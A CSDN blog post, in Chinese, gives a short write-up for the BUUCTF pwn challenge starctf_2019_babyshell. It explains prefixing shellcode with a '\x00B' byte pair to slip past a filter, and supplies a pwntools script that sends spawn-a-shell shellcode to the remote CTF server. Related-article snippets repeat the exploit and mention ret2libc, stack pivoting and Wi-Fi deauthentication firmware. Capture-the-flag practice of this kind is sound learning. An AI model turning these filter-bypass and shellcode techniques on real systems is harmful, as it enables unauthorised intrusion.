[BUUCTF-pwn]——starctf_2019_babyshell

最新推荐文章于 2023-08-24 11:32:32 发布
最新推荐文章于 2023-08-24 11:32:32 发布
阅读量535 收藏 1
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/115409705
版权

CTF shellcode 汇编语言 漏洞利用 远程连接
关键词由CSDN通过智能技术生成

[BUUCTF-pwn]——starctf_2019_babyshell

学到了, 又学到了FMYY师傅太强了

只需要通过\x00绕过检查, 同时执行我们输入的shellcode就好

**\x00B后面加上一个字符, 对应一个汇编语句。**所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查

当然其他汇编肯定也可以大家可以自己找找哈,看到别的师傅好像\x00J\x00也是可以滴

from pwn import *
context.arch = "amd64"
p = remote("node3.buuoj.cn",27993)
#p = process("./starctf_2019_babyshell")
payload = '\x00B3' + asm(shellcraft.sh())

p.sendline(payload)
p.interactive()
Y-peak
关注
专栏目录
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4087
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
[BUUCTF]PWN——starctf_2019_babyshell(有限制的shellcode)
mcmuyanga的博客
03-23 907
starctf_2019_babyshell 例行检查,64位程序,开启了nx main函数,往buf里写入shellcode,然后程序会执行shellcod sub_400786(),这个函数会对我们输入的shellcode进行检查 检查的时候*i即可退出,可以使用\x00来绕过。 ...
BUUCTF(pwn)starctf_2019_babyshell
半岛铁盒的博客
04-06 381
这里要求我们需要输入一个SHellcode 然后进入 一个 if 比较; 只需要通过\x00绕过检查, 同时执行我们输入的shellcode \x00B后面加上一个字符, 对应一个汇编语句。 所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查 from pwn import * context.arch = "amd64" p = remote("node3.buuoj.cn",27993) payload = '\x00B3' + asm(shellcraft.sh()) p...
BUUCTF之“starctf_2019_babyshell
Probeginner的博客
12-21 392
shellcode的强化
starctf_2019_babyshell
qq_62887641的博客
08-24 112
我们需要组成一个汇编指令,一来是绕过检测,二来是不妨碍shellcode。buf设置了可执行,所以往里面写shellcode就可以直接执行。当a1=0直接绕过这个,所以我们的在shellcode前面需要。可改got,没有canary,不可执行栈,没开pie。会妨碍shellcode的执行。介绍一个pwntools命令(
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 641
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
buuoj刷题记录 - starctf_2019_babyshell
qq_34010404的博客
03-31 183
输入shellcode ,然后检查shellcode 只要shellcode第一个字节是0就可以了,但是必须是有效的指令,否则无法识别会导致程序崩掉。 先填一个\x00看一下,对应的opcode 是add 后面的shellcode已经无法识别了. 看一下intel开发手册,找到add指令 可以看到对应的opcode是00,把后面的操作数补全(随便找个可以写的地址就行)就不会影响后面shellcode的解析了. 然后就可以getshell啦 Volume_2_325383_NoRestrictio
*CTF 2019 quicksort、babyshell、upxofcpp
weixin_30341735的博客
04-29 178
这次参加比赛总共出了三道,有两道队友都先交了,还是tcl,heap_master卡了差不多一天没解决。。。。还是记录一下出的题目吧 quicksort 题目大体流程就是输入要输入的数字数量,然后输入数字,经过一个快速排序输出,然后结束。 漏洞: gets函数这里存在栈溢出,可以覆盖i,j,ptr,num。 利用思路: libc泄露:可以修改ptr指向gets_got,并将i和n...
[BUUCTF]PWN——actf_2019_babystack
mcmuyanga的博客
01-19 1409
actf_2019_babystack 附件 步骤: 例行检查,64位程序,开启了nx保护 本地运行一下看看大概的情况,有两次输入 64位ida载入 程序可以输入两次,加上只能覆盖ebp和返回地址,想到的是栈迁移的方法 栈迁移主要就是使用的leave和retn这两条指令,两条指令的实质是 leave:move rbp,rsp;pop rbp retn:pop rdi 利用思路 第一个输入点固定输入0xe0,造成溢出 19行会打印出s在栈上的地址,接收一下,获得栈地址 由于没有现成的system
[Bucket CTF 2023]
weixin_52640415的博客
04-11 765
EBucker CTF 2023
python 去除不可见字符 \x00
linglongbayinhe的博客
01-15 2万+
问题:无法用json.loads()解析数据。 现象:但是将收到的数据复制粘贴成字符串就可以接续出来。纠结了很久才发现,两个长度不一样。 str是看不出来的,于是就转换成了bytes,发现 收到的数据为: <class ‘bytes’> b’\r\n\r\n\x00\x00\x00\x00\x00\x00\x00\x00{\r\n\t"author": “app”\r\n}’ 而复...
内核pwn入门之ciscn2017_babydrive UAF
qq_39948058的博客
08-28 571
前言:第一次入手内核题,全靠fmyy师傅博客的复现,复现完后,大致对uaf在内核的利用有了大概的理解。 解题步骤: 1.简短话语进行写博客吧,题目给了我们一个压缩包,把它解压,发现没有vmlinux,所以这里采用extract-vmlinux来进行提取vmlinux,为什么要提取这个文件,因为后期我们如果用到调试的时候需要调试这个文件 ./extract-vmlinux ./bzImage > vmlinux #!/bin/sh # SPDX-License-Identifier: GPL-2.0
Python乱码 b'\x1f\x8b\x08\x00\x00\x00\x00\x00\...'
热门推荐
Levy的博客
08-09 3万+
Python里面的编码问题真的让人快疯了.. 比如res打印出来是这个b’\x1f\x8b\x08\x00\x00\x00\x00\x00…’ import gzip ret = gzip.decompress(res).decode("utf-8") 搞定!
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值